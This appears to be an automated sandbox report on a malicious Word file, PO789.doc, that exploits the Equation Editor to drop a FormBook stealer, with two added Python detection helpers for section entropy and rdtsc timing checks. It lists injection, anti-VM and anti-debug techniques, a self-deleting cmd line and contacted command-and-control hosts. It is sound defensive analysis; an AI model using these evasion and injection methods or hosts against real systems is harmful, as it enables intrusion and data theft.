Source: ~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Document contains no OLE stream with summary information
Source: ~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp.0.dr OLE indicator has summary info: false
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: PO789.doc Virustotal: Detection: 57%
Source: PO789.doc ReversingLabs: Detection: 53%
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\medicomsh78694.exe C:\Users\user\AppData\Roaming\medicomsh78694.exe
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Process created: C:\Users\user\AppData\Roaming\medicomsh78694.exe {path}
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
Source: C:\Windows\SysWOW64\msdt.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\medicomsh78694.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\medicomsh78694.exe C:\Users\user\AppData\Roaming\medicomsh78694.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Process created: C:\Users\user\AppData\Roaming\medicomsh78694.exe {path} Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\medicomsh78694.exe" Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$PO789.doc Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRDB31.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winDOC@9/9@6/5
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: ~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp.0.dr OLE document summary: title field not present or empty
Source: ~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp.0.dr OLE document summary: author field not present or empty
Source: ~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp.0.dr OLE document summary: edited time not present or 0
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts (2 identical events)
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: wntdll.pdb source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000003.421954083.0000000000540000.00000004.00000001.sdmp, medicomsh78694.exe, 00000005.00000002.460764763.0000000000D20000.00000040.00000001.sdmp, medicomsh78694.exe, 00000005.00000003.422999608.00000000006A0000.00000004.00000001.sdmp, medicomsh78694.exe, 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, msdt.exe
Source: Binary string: msdt.pdb source: medicomsh78694.exe, 00000005.00000003.458755540.0000000002800000.00000004.00000001.sdmp, medicomsh78694.exe, 00000005.00000002.461556761.0000000002700000.00000040.00020000.sdmp, medicomsh78694.exe, 00000005.00000003.458361756.0000000002700000.00000004.00000001.sdmp
Source: ~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

.NET source code contains potential unpacker
Source: medicomzx[1].exe.2.dr, MainForm.cs .Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: medicomsh78694.exe.2.dr, MainForm.cs .Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4.0.medicomsh78694.exe.ad0000.0.unpack, MainForm.cs .Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4.2.medicomsh78694.exe.ad0000.2.unpack, MainForm.cs .Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.medicomsh78694.exe.ad0000.2.unpack, MainForm.cs .Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.medicomsh78694.exe.ad0000.4.unpack, MainForm.cs .Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.2.medicomsh78694.exe.ad0000.1.unpack, MainForm.cs .Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.medicomsh78694.exe.ad0000.0.unpack, MainForm.cs .Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.medicomsh78694.exe.ad0000.1.unpack, MainForm.cs .Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_0037AAA8 push eax; retn 0036h 4_2_0037AAA9
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_0037EB30 push ebx; ret 4_2_0037EB31
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_0037ABC8 push esp; ret 4_2_0037ABC9
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_0037B558 push eax; retf 0036h 4_2_0037B559
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_0041B832 push eax; ret 5_2_0041B838
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_0041B83B push eax; ret 5_2_0041B8A2
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_0041B89C push eax; ret 5_2_0041B8A2
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_0041C940 push dword ptr [D38E3050h]; ret 5_2_0041C961
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00409BCE push edx; retf 5_2_00409BCF
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00413FD9 push edx; ret 5_2_00413FDB
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_0041B7E5 push eax; ret 5_2_0041B838
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_0040B7F3 push ebp; iretd 5_2_0040B7F9
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_025FDFA1 push ecx; ret 7_2_025FDFB4
Source: initial sample Static PE information: section name: .text entropy: 7.16750619992 (2 identical events)
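The entropy figure quoted for the dropper's .text section (about 7.17 on a 0 to 8 scale) is, by its scale, Shannon entropy in bits per byte over the section's raw data. Compiled x86 code normally sits well below 7; values at or above about 7.0 point to compressed or encrypted content, which agrees with the AppDomain.Load(byte[]) unpacker and the very large strings found in the .NET source above. The Python below is an added example, not the analysis engine's code: it reads the section table of a PE image with the standard library only and computes per-section entropy. The 7.0 threshold and the minimal hand-built PE used as input (headers plus two sections, one seeded-random standing in for an encrypted payload and one repetitive standing in for plain code; not loadable) are this example's own constructions.

```python
import math
import random
import struct
from collections import Counter


def shannon_entropy(data):
    """Bits per byte: 0.0 for an empty or constant buffer, 8.0 for a uniform one."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def section_entropies(pe):
    """Return [(section_name, entropy)] by walking the PE headers: e_lfanew, then the
    COFF header's NumberOfSections and SizeOfOptionalHeader, then the section table
    (40-byte entries with SizeOfRawData at +16 and PointerToRawData at +20)."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_size
    out = []
    for i in range(num_sections):
        hdr = table + 40 * i
        name = pe[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", pe, hdr + 16)
        out.append((name, shannon_entropy(pe[raw_ptr:raw_ptr + raw_size])))
    return out


def classify_sections(entropies, threshold=7.0):
    """Attach a verdict; 7.0 is the usual packed/encrypted heuristic (example's choice)."""
    return [(name, round(e, 4), "high: packed or encrypted?" if e >= threshold else "low: plain code or data")
            for name, e in entropies]


def build_minimal_pe(sections):
    """Constructed test image: DOS header, PE signature, COFF header with no optional
    header, section table, raw section data. Enough for the parser above, not loadable."""
    e_lfanew = 0x40
    data_ptr = e_lfanew + 4 + 20 + 40 * len(sections)
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x0102)
    table, blobs = b"", b""
    for i, (name, data) in enumerate(sections):
        table += struct.pack("<8sIIII", name.encode(), len(data), 0x1000 * (i + 1), len(data), data_ptr) + b"\0" * 16
        blobs += data
        data_ptr += len(data)
    return dos + b"PE\0\0" + coff + table + blobs


# Constructed inputs: seeded pseudo-random bytes stand in for an encrypted payload,
# a repeated prologue-like byte pattern stands in for ordinary compiled code.
_rng = random.Random(1337)
PACKED = bytes(_rng.getrandbits(8) for _ in range(8192))
PLAIN = (b"\x55\x8b\xec\x83\xec\x10\x53\x56\x57" + b"\x90" * 7) * 256
SAMPLE_PE = build_minimal_pe([(".text", PACKED), (".rdata", PLAIN)])

if __name__ == "__main__":
    for name, entropy, verdict in classify_sections(section_entropies(SAMPLE_PE)):
        print(f"{name:8} {entropy:.4f}  {verdict}")
```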

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\medicomsh78694.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX (49 identical events)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX (3 identical events)
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Process information set: NOOPENFILEERRORBOX (23 identical events)
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: medicomsh78694.exe PID: 2824, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msdt.exe RDTSC instruction interceptor: First address: 0000000000088614 second address: 000000000008861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msdt.exe RDTSC instruction interceptor: First address: 00000000000889AE second address: 00000000000889B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
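The sequence the sandbox intercepted (rdtsc; xor ecx, ecx; add ecx, eax; rdtsc, the two rdtsc six bytes apart) is a timing check: the difference between two timestamp-counter reads is far larger under single-stepping, API hooking or in a hypervisor that traps RDTSC, so the malware reads it twice and compares the delta against a limit. The same shape can be found statically before the sample is run. The Python below is an added example, not part of the report: it scans a code buffer for pairs of rdtsc opcodes (0F 31) within a short window and reports them as virtual addresses. The buffer is constructed here with the intercepted byte sequence at the two offsets the report gives, under an assumed image base of 0x408000. A linear byte scan knows nothing about instruction boundaries, so a hit can be data or the tail of a longer instruction and needs confirming in a disassembler.

```python
# Opcode bytes of the x86/x64 rdtsc instruction.
RDTSC = b"\x0f\x31"


def find_rdtsc_pairs(code, base=0, max_gap=32):
    """Return (first_va, second_va, gap) for every pair of rdtsc opcodes that sit
    within max_gap bytes of each other, the shape of a delta-based timing check.
    Byte scan only: confirm each hit in a disassembler."""
    offsets = []
    pos = code.find(RDTSC)
    while pos != -1:
        offsets.append(pos)
        pos = code.find(RDTSC, pos + 1)
    pairs = []
    for first, second in zip(offsets, offsets[1:]):
        if second - first <= max_gap:
            pairs.append((base + first, base + second, second - first))
    return pairs


def format_hits(pairs):
    return [f"rdtsc pair at {a:#010x} -> {b:#010x} (gap {gap} bytes)" for a, b, gap in pairs]


# Constructed sample: a page of NOPs with the intercepted sequence placed at the two
# offsets from the report (image base assumed to be 0x408000) plus one isolated rdtsc
# that has no partner inside the window and must not be reported.
BASE = 0x408000
TIMING_CHECK = bytes.fromhex("0f31" "31c9" "01c1" "0f31")  # rdtsc; xor ecx,ecx; add ecx,eax; rdtsc
_buf = bytearray(b"\x90" * 0x1000)
for _off in (0x614, 0x9AE):
    _buf[_off:_off + len(TIMING_CHECK)] = TIMING_CHECK
_buf[0xC00:0xC02] = RDTSC
SAMPLE_CODE = bytes(_buf)

if __name__ == "__main__":
    for line in format_hits(find_rdtsc_pairs(SAMPLE_CODE, base=BASE)):
        print(line)
```

With the assumed base the two hits come out at 0x408614 -> 0x40861A and 0x4089AE -> 0x4089B4, the same first/second addresses the interceptor logged for medicomsh78694.exe; the copies inside msdt.exe sit at the same offsets from a different base, which is one more sign that the same image was written into that process.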
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2552 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe TID: 2032 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\msdt.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_004088E0 rdtsc 5_2_004088E0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Thread delayed: delay time: 922337203685477
Source: explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.514374619.000000000457A000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp Binary or memory string: vmware
Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000006.00000000.514374619.000000000457A000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: explorer.exe, 00000006.00000000.514300664.00000000044E7000.00000004.00000001.sdmp Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000006.00000000.425259363.000000000029B000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: explorer.exe, 00000006.00000000.514860954.00000000045D6000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_004088E0 rdtsc 5_2_004088E0
Enables debug privileges
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Process token adjusted: Debug
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00BC26F8 mov eax, dword ptr fs:[00000030h] 5_2_00BC26F8
Source: C:\Windows\SysWOW64\msdt.exe Code function: 7_2_026026F8 mov eax, dword ptr fs:[00000030h] 7_2_026026F8
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\msdt.exe Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00409B50 LdrLoadDll, 5_2_00409B50
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.muzicalbox.com
Source: C:\Windows\explorer.exe Network Connect: 23.227.38.74 80
Source: C:\Windows\explorer.exe Network Connect: 91.195.240.13 80
Source: C:\Windows\explorer.exe Domain query: www.extraordinarymiracle.com
Source: C:\Windows\explorer.exe Domain query: www.realstakepool.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Network Connect: 109.94.209.123 80
Source: C:\Windows\explorer.exe Domain query: www.prestigiousuniforms.com
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Section unmapped: C:\Windows\SysWOW64\msdt.exe base address: C40000
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\msdt.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\msdt.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Memory written: C:\Users\user\AppData\Roaming\medicomsh78694.exe base: 400000 value starts with: 4D5A
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Thread register set: target process: 1764
Source: C:\Windows\SysWOW64\msdt.exe Thread register set: target process: 1764
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\medicomsh78694.exe C:\Users\user\AppData\Roaming\medicomsh78694.exe
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Process created: C:\Users\user\AppData\Roaming\medicomsh78694.exe {path}
Source: C:\Windows\SysWOW64\msdt.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\medicomsh78694.exe"
Source: explorer.exe, 00000006.00000000.445207583.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.435031021.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.425787862.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.512334695.0000000000750000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.433735191.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.444882929.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmp Binary or memory string: ProgmanG
Source: explorer.exe, 00000006.00000000.445207583.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.435031021.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.425787862.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.512334695.0000000000750000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: explorer.exe, 00000006.00000000.445207583.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.435031021.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.425787862.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.512334695.0000000000750000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Queries volume information: C:\Users\user\AppData\Roaming\medicomsh78694.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 4.2.medicomsh78694.exe.3221198.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.medicomsh78694.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.medicomsh78694.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.medicomsh78694.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 4.2.medicomsh78694.exe.3221198.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.medicomsh78694.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.medicomsh78694.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.medicomsh78694.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, type: MEMORY